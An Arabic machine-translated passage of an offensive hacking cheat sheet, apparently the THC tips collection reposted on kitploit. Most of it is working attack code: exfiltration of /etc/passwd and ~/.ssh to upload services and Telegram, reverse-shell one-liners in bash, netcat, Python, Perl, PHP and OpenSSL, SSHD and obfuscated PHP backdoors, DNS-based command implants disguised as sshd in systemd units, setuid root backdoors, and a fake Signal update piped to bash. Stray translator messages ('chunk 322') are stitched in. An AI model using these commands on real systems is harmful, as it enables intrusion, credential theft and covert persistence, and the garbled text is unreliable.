قصّ والصق في bash الخاص بك:```sh transfer() { [[ $# -eq 0 ]] && { echo -e >&2 "Usage:\n transfer [file/directory]\n transfer [name] <FILENAME"; return 255; } [[ ! -t 0 ]] && { curl -SsfL --progress-bar -T "-" "https://transfer.sh/${1}"; return; } [[ ! -e "$1" ]] && { echo -e >&2 "Not found: $1"; return 255; } [[ -d "$1" ]] && { (cd "${1}/.."; tar cfz - "${1##*/}")|curl -SsfL --progress-bar -T "-" "https://transfer.sh/${1##*/}.tar.gz"; return; } curl -SsfL --progress-bar -T "$1" "https://transfer.sh/${1##*/}" }

root@kitploit:~
ثم ارفع ملفًا أو مجلدًا:```sh
transfer /etc/passwd  # A single file
transfer ~/.ssh       # An entire directory
(curl ipinfo.io; hostname; uname -a; cat /proc/cpuinfo) | transfer "$(hostname)"

قائمة بمواقع الرفع العامة المفضلة لدينا.


4.ix. نقل الملفات - باستخدام rsync

مثالي لمزامنة عدد كبير من الدلائل أو إعادة تشغيل عمليات النقل المتقطعة. ينقل المثال الدليل 'warez' إلى جهاز الاستقبال باستخدام اتصال TCP واحد من جهاز الإرسال إلى جهاز الاستقبال.```posh echo -e "[up]\npath=upload\nread only=false\nuid=$(id -u)\ngid=$(id -g)" >r.conf mkdir upload rsync --daemon --port=31337 --config=r.conf --no-detach

root@kitploit:~
المرسل:```posh
rsync -av warez rsync://1.2.3.4:31337/up

نفس التشفير (OpenSSL):

المستلم:```posh

use rsa:2048 if ed25519 is not supported (e.g. rsync connection error)

openssl req -subj '/CN=example.com/O=EL/C=XX' -new -newkey ed25519 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt cat ssl.key ssl.crt >ssl.pem rm -f ssl.key ssl.crt mkdir upload cat ssl.pem socat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.pem EXEC:"rsync --server -logtprR --safe-links --partial upload"

root@kitploit:~
المرسل:```posh
# Copy the ssl.pem from the Receiver to the Sender and send directory named 'warez'
IP=1.2.3.4
PORT=31337
# Using rsync + socat-ssl
up1() {
   rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:${IP:?}:${PORT:-31337},cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- "$@"  0:
}
# Using rsync + openssl
up2() {
   rsync -ahPRv -e "bash -c 'openssl s_client -connect ${IP:?}:${PORT:-31337} -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- "$@"  0:
}
up1 /var/www/./warez
up2 /var/www/./warez

Rsync يمكن دمجه لاستخراج البيانات عبر https / أنفاق TCP الخام عبر cloudflared.
(لاستخراج البيانات من ويندوز، استخدم rsync.exe من حزمة ويندوز gsocket). الحل الأكثر ضجيجًا هو syncthing.

نصيحة احترافية: المخترقون الكسالى يكتبون فقط exfil على segfault.net.


4.x. نقل الملفات - باستخدام WebDAV

على جهاز الاستقبال (مثل segfault.net) ابدأ تشغيل Cloudflare-Tunnel وWebDAV:```sh cloudflared tunnel --url localhost:8080 &

[...]

+--------------------------------------------------------------------------------------------+

| Your quick Tunnel has been created! Visit it at (it may take some time to be reachable): |

| https://example-foo-bar-lights.trycloudflare.com |

+--------------------------------------------------------------------------------------------+

[...]

wsgidav --port=8080 --root=. --auth=anonymous

root@kitploit:~
على خادم آخر:```sh
# Upload a file to your workstation
curl -T file.dat https://example-foo-bar-lights.trycloudflare.com
# Create a directory remotely
curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources
# Create a directory hierarchy remotely
find . -type d | xargs -I{} curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources/{}
# Upload all *.c files (in parallel):
find . -name '*.c' | xargs -P10 -I{} curl -T{} https://example-foo-bar-lights.trycloudflare.com/sources/{}

الوصول إلى المشاركة من ويندوز (لسحب وإفلات الملفات) في مستكشف الملفات:``` \example-foo-bar-lights.trycloudflare.com@SSL\sources

root@kitploit:~
أو قم بتركيب مشاركة WebDAV على Windows (Z:/):```
net use * \\example-foo-bar-lights.trycloudflare.com@SSL\sources

4.xi. نقل الملفات إلى تيليغرام

هناك عدد هائل من خدمات الرفع لكن TG بديل أنيق. احصل على TG-Bot-Token من TG BotFather. ثم أنشئ مجموعة TG جديدة وأضف بوتك إلى المجموعة. استرجع chat_id الخاص بتلك المجموعة:```sh curl -s "https://api.telegram.org/bot/getUpdates" | jq -r '.result[].message.chat.id' | uniq

If you get only {"ok":true,"result":[]} then remove and add the bot again.

root@kitploit:~
## ⚙️ التثبيت والاستخدام```sh
# Upload file.zip straight into the group chat:
curl -sF [email protected] "https://api.telegram.org/bot<TG-BOT-TOKEN>/sendDocument?chat_id=<TG-CHAT-ID>"

5. Reverse Shell / Dumb Shell

نصيحة: استخدم https://www.revshells.com/ 👌

5.i.a. Reverse shell باستخدام gs-netcat (مشفّر)

انظر 6. Backdoors للحصول على سطر واحد لنشر والوصول إلى Reverse shell من نوع PTY كامل الوظائف باستخدام https://gsocket.io/deploy.

5.i.b. Reverse shell باستخدام Bash

ابدأ netcat للاستماع على المنفذ 1524 على نظامك:```sh nc -nvlp 1524

root@kitploit:~
بعد الاتصال، قم [بترقية](#reverse-shell-interactive) شلّتك إلى شل PTY تفاعلية بالكامل. بدلاً من ذلك، استخدم [pwncat-cs](https://pwncat.org/) بدلاً من netcat:```sh
pwncat -lp 1524
# Press "Ctrl-C" if pwncat gets stuck at "registered new host ...".
# Then type "back" to get the prompt of the remote shell.

على النظام البعيد، سيعيد هذا الأمر الاتصال بنظامك (IP = 3.13.3.7, Port 1524) ويمنحك موجه أوامر:```sh

If the current shell is Bash already:

(bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 &)

If the current shell is NOT Bash then we need:

bash -c '(exec bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 &)'

or hide the bash process as 'kqueue'

bash -c '(exec -a kqueue bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 &)'

root@kitploit:~
بدلاً من ذلك، على النظام البعيد، ضع هذا في `~/.profile` أو crontab لإعادة تشغيل connect-back shell (وأيضًا يمنع تشغيل عدة نسخ في نفس الوقت):```sh
fuser /dev/shm/.busy &>/dev/null || (bash -c 'while :; do touch /dev/shm/.busy; exec 3</dev/shm/.busy; bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 360; done' &>/dev/null &)

5.i.c. ريفرس شل باستخدام cURL (مشفر)

استخدم curlshell. يعمل هذا أيضًا عبر البروكسيات وعندما يكون اتصال TCP المباشر بالعالم الخارجي محظورًا:```sh

On YOUR workstation

Generate SSL keys:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC"

Start your listening server:

./curlshell.py --certificate cert.pem --private-key key.pem --listen-port 8080

root@kitploit:~
```sh
# On the target:
curl -skfL https://3.13.3.7:8080 | bash

5.i.d قشرة عكسية باستخدام cURL (نص صريح)

ابدأ ncat للاستماع لعدة اتصالات:```sh ncat -kltv 1524

root@kitploit:~
```sh
# On the target:
C="curl -Ns telnet://3.13.3.7:1524"; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null

5.i.e. شل عكسي باستخدام OpenSSL (مشفَّر)```sh

On YOUR workstation:

Generate SSL keys:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC"

Start your listening server:

openssl s_server -port 1524 -cert cert.pem -key key.pem

Or pwncat:

pwncat -lp 1524 --ssl

root@kitploit:~
Please provide the Markdown content to translate.```sh
# On the target, start an openssl reverse shell as background process:
({ openssl s_client -connect 3.13.3.7:1524 -quiet </dev/fd/3 3>&- 2>/dev/null | sh 2>&3 >&3 3>&- ; } 3>&1 | : & )

5.i.f. شل عكسي بدون /dev/tcp

لا تحتوي الأنظمة المدمجة دائمًا على Bash ولن تعمل خدعة /dev/tcp/. توجد طرق أخرى كثيرة (Python، PHP، Perl، ..). طريقتنا المفضلة هي رفع netcat ثم استخدام netcat أو telnet:

على النظام البعيد:```sh nc -e /bin/sh -vn 3.13.3.7 1524

root@kitploit:~
البديل إذا لم يكن *'-e'* مدعومًا:```sh
{ nc -vn 3.13.3.7 1524 </dev/fd/3 3>&- | sh 2>&3 >&3 3>&- ; } 3>&1 | :
  • في الأصداف الحديثة يمكن اختصار ذلك إلى { nc 3.13.3.7 1524 </dev/fd/2|sh;} 2>&1|:. (شكرًا IA_PD).
  • حيلة | : لن تعمل على C-Shell/tcsh (FreeBSD)، أو Bourne shell الأصلي (Solaris)، أو Korn shell (AIX). استخدم mkfifo بدلاً من ذلك.

نسخة بديلة لـ /bin/sh الأقدم:```sh mkfifo /tmp/.io; sh -i 2>&1 </tmp/.io | nc -vn 3.13.3.7 1524 >/tmp/.io

root@kitploit:~
نسخة Telnet:```sh
mkfifo /tmp/.io; sh -i 2>&1 </tmp/.io | telnet 3.13.3.7 1524 >/tmp/.io

صيغة Telnet عندما لا يكون mkfifo مدعومًا (أخ!):```sh touch /tmp/.fio; tail -f /tmp/.fio | sh -i | telnet 3.13.3.7 31337 >/tmp/.fio

root@kitploit:~
Note: لا تنسَ تنفيذ `rm /tmp/.fio` بعد تسجيل الدخول.



<a id="revese-shell-remote-moe"></a>
**5.i.h. الصدفة العكسية مع remote.moe و ssh (مشفّر)**

من الممكن تمرير TCP خام (مثل صدفة عكسية bash) عبر [remote.moe](https://remote.moe):```sh
# First Terminal - Create a remote.moe tunnel to your workstation
ssh-keygen -q -t rsa -N "" -f .r  # New key creates a new remote.moe-address
ssh -i .r -R31337:0:8080 -o StrictHostKeyChecking=no [email protected]; rm -f .r
# Note down the 'remote.moe' address which will look something like
# uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe

# Second Terminal - start listening for the reverse shell
nc -vnlp 8080

على الهدف (يتطلب SSH و Bash):```sh bash -c '(killall ssh; rm -f /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r; ssh -i /tmp/.r -o StrictHostKeyChecking=no -L31338:uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe:31337 -Nf remote.moe; bash -i &>/dev/tcp/0/31338 0>&1 &)'

root@kitploit:~
على الهدف (بديل؛ يتطلب ssh وbash وmkfifo):```sh
rm -f /tmp/.p /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r && mkfifo /tmp/.p && (bash -i</tmp/.p  2>1 |ssh -i /tmp/.r -o StrictHostKeyChecking=no -W uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe:31337 remote.moe>/tmp/.p &)

5.i.i. الصدفة العكسية باستخدام Python```sh python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

root@kitploit:~
<a id="reverse-shell-perl"></a>
**5.i.j. صدفة عكسية مع Perl**```sh
# method 1
perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# method 2
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

5.i.k. صدفة عكسية باستخدام PHP```sh php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");'

root@kitploit:~
<a id="reverse-shell-upgrade"></a>
<a id="reverse-shell-pty"></a>
**5.ii.a. ترقية قشرة عكسية إلى قشرة PTY**

أي من القشور العكسية المذكورة أعلاه محدودة. على سبيل المثال *sudo bash* أو *top* لن يعملا. لجعل هذه تعمل، علينا ترقية القشرة إلى قشرة PTY حقيقية:```sh
# Using script
exec script -qc /bin/bash /dev/null  # Linux
exec script -q /dev/null /bin/bash   # BSD

لا يوجد نص للإدخال.```sh

Using python

exec python -c 'import pty; pty.spawn("/bin/bash")'

root@kitploit:~
<a id="reverse-shell-interactive"></a>
**5.ii.b. ترقية القشرة العكسية إلى قشرة تفاعلية بالكامل**

...وإذا أردنا أيضاً استخدام Ctrl-C وما إلى ذلك، فيتعين علينا أن نذهب إلى أبعد حد ونرقّي القشرة العكسية إلى قشرة تفاعلية ملونة حقيقية بالكامل:```sh
# On the target host spawn a PTY using any of the above examples:
python -c 'import pty; pty.spawn("/bin/bash")'
# Now Press Ctrl-Z to suspend the connection and return to your own terminal.

لم يتم توفير أي محتوى للإدخال (INPUT) في الرسالة. يرجى إرسال نص chunk 322 لترجمته.```

On your terminal execute:

stty raw -echo icrnl opost; fg

root@kitploit:~
Please provide the Markdown content to translate.```sh
# On target host
export SHELL=/bin/bash
export TERM=xterm-256color
reset -I
stty -echo;printf "\033[18t";read -rdt R;stty sane $(echo "${R:-8;80;25}"|awk -F";" '{ printf "rows "$3" cols "$2; }')
# Pimp up your prompt
# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '

5.ii.c. قشرة عكسية باستخدام socat (تفاعلية بالكامل)

...أو قم بتثبيت socat وأنجز الأمر دون الكثير من العبث:```sh

on attacker's host (listener)

socat file:tty,raw,echo=0 tcp-listen:1524

on target host (reverse shell)

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524

root@kitploit:~
---

<a id="backdoor"></a>
## 6. الباب الخلفي

انظر [Reverse Shell / Dumb Shell](#reverse-shell) للحصول على قوالب عكسية بسيطة من سطر واحد.

<a id="gsnc"></a>
**6.i. قالب عكسي باستخدام gs-netcat**

في الغالب نستخدم سكربت النشر الآلي الخاص بـ gs-netcat: [https://www.gsocket.io/deploy](https://www.gsocket.io/deploy).```sh
bash -c "$(curl -fsSLk https://gsocket.io/y)"

أو```sh bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/y)"

root@kitploit:~
أو انشر gsocket عن طريق تشغيل خادم النشر الخاص بك:```sh
LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/ys)"  # Notice '/ys' instead of '/y'

6.ii. قشرة عكسية مع sshx.io (مشفرة)

قم بالوصول إلى قشرة بعيدة من متصفح الويب الخاص بك https://sshx.io.

قم بتمرير be sshx-backdoor مباشرة إلى الذاكرة:```shell echo $(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null
|nohup perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}"/usr/bin/python3",("-q")' 2>/dev/null
|{ read x;echo "$x";}&)

root@kitploit:~
أو الطريقة المملة:```shell
curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null >.s \
&& chmod 755 .s \
&& (PATH=.:$PATH .s -q >.u 2>/dev/null &);
for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s;

6.iii. أصغر باب خلفي لـ SSHD

  • يظل موجودًا بعد apt update
  • لا يُنشئ أي ملف جديد.
  • لا يستخدم authorized_keys أو PAM.

إضافة مفتاحك إلى authorized_keys أمر مبالغ فيه 😩. بدلاً من ذلك، بصفتك root، انسخ والصق هذا مرة واحدة على أي هدف. سيضيف سطرًا واحدًا إلى إعدادات SSHD ويسمح لك بتسجيل الدخول إلى الأبد:```shell backdoor_sshd() { local B="/etc/ssh" local K="${B}/ssh_host_ed25519_key" D="${B}/sshd_config.d" local N=$(cd "${D}" 2>/dev/null|| exit; shopt -s nullglob; echo .conf) [ ! -f "$K" ] && K="${B}/ssh_host_rsa_key" [ -n "$N" ] && N="${N%%.conf}.conf" N="${D}/${N:-50-cloud-init.conf}" [ ! -d "${D}" ] && N="${B}/sshd_config" { [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return grep -iqm1 '^PermitRootLogin\s+no' "${B}/sshd_config" && echo >&2 "WARN: PermitRootLogin blocking in sshd_config" echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m" grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && { echo >&2 "WARN: Already backdoored"; return; } echo -e "AuthorizedKeysFile\t.ssh/authorized_keys .ssh/authorized_keys2 ${K}.pub" >>"${N}" || return touch -r "$K" "$N" "$D"
&& declare -F ctime >/dev/null && ctime "$N" "$D" command -v systemctl >/dev/null && { systemctl restart ssh;:;} || service ssh restart } backdoor_sshd

root@kitploit:~
كيف يعمل:
- مفتاح مضيف SSHD هو مجرد مفتاح ed25519 عادي.
- يمكن استخدام أي مفتاح ed25519 لمصادقة مستخدم.
- يتحقق SSHD من `~/.ssh/authorized_keys` (لكن هذه الحيلة أصبحت مُستنفدة).
- بدلاً من ذلك، قم بتهيئة SSHD للتحقق أيضًا من `/etc/ssh/sshd_host_ed25519_key.pub` بحثًا عن مفاتيح تسجيل الدخول.
- سيتحقق SSHD الآن من `~/.ssh/authorized_keys` _و_ `/etc/ssh/ssh_host_ed25519_key.pub` بحثًا عن مفاتيح تسجيل دخول صالحة.
- استخدم المفتاح السري `/etc/ssh/sshd_host_ed25519_key` لتسجيل الدخول إلى الهدف.

<a id="backdoor-network"></a>
**6.vi. الوصول عن بُعد إلى شبكة كاملة**

ثبّت [gs-netcat](https://github.com/hackerschoice/gsocket). فهو ينشئ عقدة خروج SOCKS على الشبكة المحلية الخاصة للمضيف، يمكن الوصول إليها عبر شبكة الترحيل الكروية العامة دون الحاجة إلى تشغيل خادم الترحيل الخاص بك (مثل الوصول إلى الشبكة المحلية الخاصة البعيدة مباشرة من محطة العمل الخاصة بك):```sh
gs-netcat -l -S       # compromised Host

الآن من محطة العمل الخاصة بك يمكنك الاتصال بأي مضيف على الشبكة المحلية الخاصة بالمضيف:```sh gs-netcat -p 1080 # Your workstation.

Access route.local:22 on the Host's private LAN from your Workstation:

socat - "SOCKS4a:127.1:route.local:22"

root@kitploit:~
اقرأ [استخدم أي أداة عبر Socks Proxy](#scan-proxy).

طرق أخرى:
* [Gost/Cloudflared](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) - مقالنا الخاص
* [Reverse Wireguard](https://thc.org/segfault/wireguard) - من segfault.net إلى أي شبكة (داخلية).

<a id="php-backdoor"></a>
**6.v. أصغر باب خلفي PHP**

أضف هذا السطر في بداية أي ملف PHP:```php
<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>

إنه ترميز base64 لـ:```php if(isset($_POST[0])){system($_POST[0]);die;}

root@kitploit:~
اختبر الباب الخلفي:```sh
### 1. Optional: Start a test PHP server
cd /var/www/html && php -S 127.0.0.1:8080
### Without executing a command
curl http://127.0.0.1:8080/test.php
### With executing a command
curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id"

في بعض الأحيان يكون system() محظورًا. أضف eval() للسماح بتنفيذ كود PHP عن بُعد كخطة احتياطية. قم بإخفائها ضمن تعليقات base64 أخرى لبعض التمويه:```php

root@kitploit:~
قم بالتشغيل باستخدام أي من هذه لتنفيذ أمر أو كود PHP:```shell
# Execute just command
curl http://127.0.0.1:8080/x.php -d0='id'
# Execute just PHP code
curl http://127.0.0.1:8080/x.php -d0='' -d1='echo file_get_contents("/etc/hosts");'

6.vi. أصغر باب خلفي لنفق DNS عكسي

...في PHP:

نفّذ أوامر اعتباطية على خادم غير قابل للوصول من الإنترنت العام باستخدام مشغّل DNS عكسي.

أضف هذا السطر (الغرسة) في بداية أي ملف PHP:```php

root@kitploit:~
يطلب implant الحمولة عبر طلب DNS TXT من النطاق `b00m.team-teso.net`. عند التشغيل، ينشئ `/tmp/.b00m` ويُشعر THC (عبر استدعاء من app.interactsh.com). *يُرجى* استخدام نطاقك الخاص وإنشاء حمولتك الخاصة أيضًا. مثال:```shell
echo -n '@system("{ id; date;}>/tmp/.b00m 2>/dev/null");' |base64 -w0
  • حمولة DNS TXT محدودة بـ 2,048 حرفًا (وأحيانًا 65,535 حرفًا).
  • الزرعة عبارة عن bootloader. استخدم حلقة while لتنزيل وتنفيذ حمولة أكبر عبر DNS.
  • اطّلع على أماكننا المفضلة لتسجيل نطاق بشكلٍ مجهول. Cloudflare Free-Tier تُعد بداية جيدة.

...في BASH:

أضف هذه الزرعة إلى ~/.bashrc للهدف أو إلى crontab (demo-paypload):```shell

Use a "double bash" to redirect also errors from $()-subshell to /dev/null:

bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ "|base64 -d);}"'&>/dev/null

root@kitploit:~
أو غيّر الحمولة التجريبية (demo-payload) إلى حمولة متقنة:
- تشغّل خفيًا في الخلفية للاستعلام كل ساعة لتنفيذ الأوامر.
- تعتمد على bash وdig وbase64 فقط.
- تتنكر باسم `sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups`
- المثال يستخدم `b00m2.team-teso.net` مجددًا وينشئ /tmp/.b00m كل ساعة.

قصّ والصق ما يلي في شل الهدف لإنشاء الزرعة المكوّنة من سطر واحد:```shell
# If dig does not exists then replace /dig +short.../ with
# /nslookup -q=txt '"$D"'|grep -Fm1 "text ="|sed -E "s|.*text = (.*)|\1|g;s|[\" ]||g"|base64 -d|bash/
# or use the Perl example below.
base64 -w0 >x.txt <<-'EOF'
D=b00m2.team-teso.net
P="sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
M=/dev/shm/.cache${UID}
[ -f $M ]&&exit
touch $M
(echo 'slp(){ local IFS;[ -n "${_sfd:-}" ]||exec {_sfd}<> <(:);read -t$1 -u$_sfd||:;}
slp 1
while :; do
	dig +short '"$D"' TXT|tr -d \ \"|base64 -d|bash
	slp 3600
done'|exec -a "$P" bash &) &>/dev/null
EOF
echo "===> Add the following to the target's ~/.bashrc or cronjob:"$'\n\033[0;36m'"echo $(<x.txt)|base64 -d|bash"$'\033[0m'
rm -f x.txt

أضف النتيجة المكوّنة من سطر واحد للسكربت إلى أي سكربت بدء تشغيل على الهدف (استخدم crontab أو ~/.bashrc أو udev أو ExecStartPre=). إليك مثال ذكي لـ /usr/lib/systemd/system/ssh.service (مع بعض الإخفاء الإضافي):``` ... [Service] EnvironmentFile=-/etc/default/ssh Environment="SSHD=echo RD1iMDBtMi50ZWFtLXRlc28ubmV0ClA9InNzaGQ6IC91c3Ivc2Jpbi9zc2hkIC1EIFtsaXN0ZW5lcl0gMCBvZiAxMC0xMDAgc3RhcnR1cHMiCk09L2Rldi9zaG0vLmNhY2hlJHtVSUR9ClsgLWYgJE0gXSYmZXhpdAp0b3VjaCAkTQooZWNobyAnc2xwKCl7IGxvY2FsIElGUztbIC1uICIke19zZmQ6LX0iIF18fGV4ZWMge19zZmR9PD4gPCg6KTtyZWFkIC10JDEgLXUkX3NmZHx8Ojt9CnNscCAxCndoaWxlIDo7IGRvCmRpZyArc2hvcnQgJyIkRCInIFRYVHx0ciAtZCBcIFwifGJhc2U2NCAtZHxiYXNoCnNscCAzNjAwCmRvbmUnfGV4ZWMgLWEgIiRQIiBiYXNoICYpICY+L2Rldi9udWxsCg==|base64 -d|bash" ExecStartPre=-bash -c 'eval $SSHD' ExecStartPre=/usr/sbin/sshd -t ExecStart=/usr/sbin/sshd -D $SSHD_OPTS ...

root@kitploit:~
...في PERL:
---
نفس الشيء ولكن يحتاج فقط إلى perl + bash (بدون dig):```shell
perl -MMIME::Base64 -e '$/=undef;print encode_base64(<>,"")' >x.txt <<-'EOF'
D=b00m2.team-teso.net
P="sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
M=/dev/shm/.cache-1-${UID}
(echo 'use Net::DNS;use MIME::Base64;exit(0) if -e "'"$M"'";close(open($f,">","'"$M"'"));for (;;) { system decode_base64((Net::DNS::Resolver->new->query(q/'"$D"'/,q/TXT/)->answer)[0]->txtdata=~y/ \\//dr);sleep(3600)}'|exec -a "$P" perl &) &>/dev/null
EOF
echo "===> Execute the following on the target:"$'\n\033[0;36m'"perl -MMIME::Base64 -e'print decode_base64(\"$(<x.txt)\")'|bash"$'\033[0m'
rm -f x.txt

(شكرًا إلى LouCipher على نسخة perl)

...بـ PYTHON:

اقطع والصق ما يلي في شاشتك الطرفية:```shell pydnsbackdoorgen() { local str echo -e "This is the TXT record for ${1:?}\e[0;33m" base64 -w0 <"${2:?}" str="$(echo -en 'import dns.resolver\nexec(base64.b64decode("".join([d.to_text() for d in dns.resolver.resolve("'"${1:?}"'", "TXT").rrset])))' | base64 -w 0)" echo -e "\e[0m\nAdd this implant string to a target's python script:\e[0;32m" echo "exec('"'try:\n\timport base64\n\texec(base64.b64decode("'"${str}"'"))\nexcept:\n\tpass'"')" echo -e "\e[0m" }

root@kitploit:~
أنشئ حمولتك (سيتم تنفيذ `egg.py` على الهدف):```shell
cat >egg.py<<-'EOF'
import time
dns.resolver.resolve(f"{int(time.time())}.yzlespkpfkqfrtwgvhngkyqbuod49rgmo.oast.fun")
EOF

قم بإنشاء الحمولة الخاصة بك (واتبع التعليمات):```shell pydnsbackdoorgen b00mpy.team-teso.net egg.py

root@kitploit:~
<a id="ld-backdoor"></a>
**6.vii. باب خلفي محلي للجذر**

#### 1. زرع باب خلفي في المحمّل الديناميكي باستخدام setcap```bash
### Execute as ROOT user
fn="$(readlink -f /lib64/ld-*.so.*)" || fn="$(readlink -f /lib/ld-*.so.*)" || fn="/lib/ld-linux.so.2"
setcap cap_setuid,cap_setgid+ep "${fn}"

The input chunk is empty—there is no content provided to translate. Please supply the actual Markdown text for chunk 374.```bash

Execute as non-root user to get root

fn="$(readlink -f /lib64/ld-.so.)" || fn="$(readlink -f /lib/ld-.so.)" || fn="/lib/ld-linux.so.2" p="$(command -v python3 2>/dev/null)" || p="$(command -v python)" "${fn:?}" "$p" -c 'import os;os.setuid(0);os.setgid(0);os.execlp("bash", "kdaemon")'

root@kitploit:~
#### 2. شل b00m الكلاسيكي```shell
{ cp /bin/sh /var/tmp/.b00m; chmod 6775 /var/tmp/.b00m; } 2>/dev/null >/dev/null

[لا يوجد محتوى للإدخال]```shell exec /var/tmp/.b00m -p -c 'exec python -c "import os;os.setuid(0);os.execlp("bash", "kdaemon")"'

root@kitploit:~
<a id="implant"></a>
**6.viii. الغرسة ذاتية الاستخراج**

أنشئ سكربت شل ذاتي الاستخراج باستخدام [mkegg.sh](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/mkegg.sh) (راجع المصدر للأمثلة).

مثال بسيط:```sh
# Create implant 'egg.sh' containing the file 'foo'
# and the directory 'warez'. When executing 'egg.sh' then
# extract 'foo' and 'warez' and call 'warez/run/sh'
./mkegg.sh egg.sh foo warez warez/run.sh

الأمثلة الواقعية هي الأفضل:

  1. أنشئ زرعًا يثبّت gsocket ويستدعي webhook الخاص بنا عند النجاح:```sh ./mkegg.sh egg.sh deploy-all.sh '(GS_WEBHOOK_KEY=e90d4b38-8285-490d-b5ab-a6d5c7c990a7 deploy-all.sh 2>/dev/null >/dev/null &)'

On the target system do: 'cat egg.sh | bash' or './egg.sh'

root@kitploit:~
2. أعد تسمية `egg.sh` إلى `update-for-fools.txt` وارفعه كـ blob إلى مستودع [Signal](https://www.signal.org/) على GitHub.

3. لا تخدع الناس لتحديث Signal باستخدام هذا الأمر ❤️:```sh
curl -fL https://github.com/signalapp/Signal-Desktop/files/15037868/update-for-fools.txt | bash

7. استطلاع المضيف


احصل على المعلومات الأساسية حول المضيف:```sh bash -c "$(curl -fsSL https://thc.org/ws)"

root@kitploit:~
أو```sh
bash -c "$(curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/whatserver.sh)"

netstat إذا لم يكن هناك netstat/ss/lsof:```sh curl -fsSL https://raw.githubusercontent.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/master/tools/awk_netstat.sh | bash

root@kitploit:~
فحص سرعة النظام```sh
curl -fsSL https://bench.sh | bash
# Another speed check:  
# curl -fsSL https://yabs.sh | bash

اعثر على جميع ثنائيات suid/sgid:``` find / -xdev -type f -perm /6000 -ls 2>/dev/null

root@kitploit:~
البحث عن جميع المجلدات القابلة للكتابة:```bash
wfind() {
    local arr dir

    arr=("$@")
    while [[ ${#arr[@]} -gt 0 ]]; do
        dir=${arr[${#arr[@]}-1]}
        unset "arr[${#arr[@]}-1]"
        find "$dir"  -maxdepth 1 -type d -writable -ls 2>/dev/null
        IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null))
    done
}
# Usage: wfind /
# Usage: wfind /etc /var /usr 

ابحث عن كلمات المرور المحلية (باستخدام noseyparker أو trufflehog):```sh curl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static chmod 700 np &&
./np scan . &&
./np report --color=always | less -R

root@kitploit:~
- استخدم [PassDetective](https://github.com/aydinnyunus/PassDetective) للعثور على كلمات المرور في ~/.*history
